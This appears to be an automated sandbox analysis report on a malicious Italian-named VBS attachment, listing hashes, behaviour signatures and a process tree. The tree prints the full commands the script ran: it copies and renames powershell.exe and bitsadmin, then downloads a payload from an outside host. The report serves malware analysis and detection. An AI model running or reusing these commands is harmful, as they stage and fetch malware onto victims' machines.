Analysis
-
max time kernel
150s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
21-02-2022 22:48
Static task
static1
Behavioral task
behavioral1
Sample
Allegato_doc_JNKMTJ64B29L424O.vbs
Resource
win7-en-20211208
General
-
Target
Allegato_doc_JNKMTJ64B29L424O.vbs
-
Size
8KB
-
MD5
5d2f707cea7e80c85d83f14213e1d7e0
-
SHA1
6a7e4e3a532ef4cbbf77508931324a20fe79d7e2
-
SHA256
d3d75e2f255c63ccc14496877d562f04641da53ce9bf064b1b8e4969034cce9a
-
SHA512
beb572b51df993ed0a7464789a211d79b906387fdcceff2bcb517c98f83c933fc3513c6e707ae3b7209b1f6d618ccbd7284b17704083b8023e1c61ccf6868090
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
wjOytesin.exepid process 3616 wjOytesin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops file in Windows directory 3 IoCs
Processes:
svchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MusNotifyIcon.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe -
Modifies data under HKEY_USERS 51 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4348" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4124" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.009703" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.081500" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "8.330232" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4148" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132901337433154351" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "5.633851" svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
TiWorker.exedescription pid process Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe Token: SeRestorePrivilege 1180 TiWorker.exe Token: SeSecurityPrivilege 1180 TiWorker.exe Token: SeBackupPrivilege 1180 TiWorker.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 3272 wrote to memory of 2572 3272 WScript.exe cmd.exe PID 3272 wrote to memory of 2572 3272 WScript.exe cmd.exe PID 2572 wrote to memory of 3996 2572 cmd.exe cmd.exe PID 2572 wrote to memory of 3996 2572 cmd.exe cmd.exe PID 2572 wrote to memory of 1428 2572 cmd.exe cmd.exe PID 2572 wrote to memory of 1428 2572 cmd.exe cmd.exe PID 3272 wrote to memory of 3616 3272 WScript.exe wjOytesin.exe PID 3272 wrote to memory of 3616 3272 WScript.exe wjOytesin.exe PID 3272 wrote to memory of 3616 3272 WScript.exe wjOytesin.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_JNKMTJ64B29L424O.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnpWSeyED.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\wjOytes*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnpWSeyED.exe3⤵PID:3996
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\wjOytes*.exe3⤵PID:1428
-
-
-
C:\ProgramData\wjOytesin.exe"C:\ProgramData\wjOytesin.exe" /transfer szPZvX /download https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css C:\Users\Admin\AppData\Roaming\uk.css2⤵
- Executes dropped EXE
PID:3616
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3564
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
PID:2364
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
-
MD5
f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a